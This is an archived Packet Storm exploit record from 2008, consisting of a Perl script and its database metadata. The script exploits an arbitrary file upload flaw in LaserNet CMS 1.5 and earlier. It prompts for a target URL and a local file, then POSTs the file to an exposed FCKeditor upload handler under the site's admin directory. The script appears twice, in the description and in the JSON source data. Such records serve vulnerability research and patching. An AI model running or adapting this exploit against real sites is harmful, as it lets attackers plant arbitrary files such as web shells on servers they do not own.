ID PACKETSTORM:67555
Type packetstorm
Reporter t0pp8uzz
Modified 2008-06-23T00:00:00
Description
`#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
+++++++++++++++++++++++++++++++++++++++++++++++++++++
+ LaserNet CMS <= 1.5 Arbitrary File Upload Exploit +
+ +
+ Discovered && Coded By: t0pP8uZz +
+ Discovered On: 19 JUNE 2008 / milw0rm.com +
+ Script Download: http://lasernet.gr/cms.php +
+++++++++++++++++++++++++++++++++++++++++++++++++++++
INTRO
print "Enter URL(ie: http://site.com): ";
chomp(my $url=<STDIN>);
print "Enter File Path(path to local file to upload): ";
chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/admin/FCKeditor/editor/filemanager/upload/php/upload.php',
Content_Type => 'form-data',
Content => [ NewFile => $file ] );
if($re->is_success) {
if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
else { print "File Upload Is Disabled! Failed!\n"; }
} else { print "HTTP Request Failed!\n"; }
exit;
`
{"type": "packetstorm", "published": "2008-06-23T00:00:00", "reporter": "t0pp8uzz", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "5c7a7f180d8134062c6005a90253f2e3"}, {"key": "modified", "hash": "3d5ffd8bbdf07c37cdb06163a5c7924e"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "3d5ffd8bbdf07c37cdb06163a5c7924e"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "6ae4571c7d8e7d463247ccc5545c05d5"}, {"key": "sourceData", "hash": "e6ad557c92d47c96c2870a6baa4e29af"}, {"key": "sourceHref", "hash": "04f44480562eb976f88e39dfa477e7eb"}, {"key": "title", "hash": "ea9753376f0f4ea214444d1f88ab609a"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`#!/usr/bin/perl \n \nuse strict; \nuse warnings; \nuse LWP::UserAgent; \nuse HTTP::Request::Common; \n \nprint <<INTRO; \n+++++++++++++++++++++++++++++++++++++++++++++++++++++ \n+ LaserNet CMS <= 1.5 Arbitrary File Upload Exploit + \n+ + \n+ Discovered && Coded By: t0pP8uZz + \n+ Discovered On: 19 JUNE 2008 / milw0rm.com + \n+ Script Download: http://lasernet.gr/cms.php + \n+++++++++++++++++++++++++++++++++++++++++++++++++++++ \n \nINTRO \n \nprint \"Enter URL(ie: http://site.com): \"; \nchomp(my $url=<STDIN>); \n \nprint \"Enter File Path(path to local file to upload): \"; \nchomp(my $file=<STDIN>); \n \nmy $ua = LWP::UserAgent->new; \nmy $re = $ua->request(POST $url.'/admin/FCKeditor/editor/filemanager/upload/php/upload.php', \nContent_Type => 'form-data', \nContent => [ NewFile => $file ] ); \n \nif($re->is_success) { \nif( index($re->content, \"Disabled\") != -1 ) { print \"Exploit Successfull! File Uploaded!\\n\"; } \nelse { print \"File Upload Is Disabled! Failed!\\n\"; } \n} else { print \"HTTP Request Failed!\\n\"; } \n \nexit; \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:25:40", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/67555/lasernet-upload.txt.html", "sourceHref": "https://packetstormsecurity.com/files/download/67555/lasernet-upload.txt", "title": "lasernet-upload.txt", "enchantments": {"score": {"vector": "NONE", "value": 2.1}, "vulnersScore": 2.1}, "references": [], "id": "PACKETSTORM:67555", "hash": "52e8da12e1f29361d9e20755bbc5f1a9ffbb4c772852ed07fb9e2f012a14106e", "edition": 1, "cvelist": [], "modified": "2008-06-23T00:00:00", "description": ""}
{}
